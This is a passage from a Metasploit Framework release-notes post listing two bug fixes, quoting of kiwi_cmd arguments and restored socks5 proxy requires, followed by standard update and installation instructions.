  • #14802 from dwelch-r7 A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the kiwi_cmd command in Metasploit where not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space separated command.
  • #14812 from dwelch-r7 Restores missing requires for sock5 proxy support.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).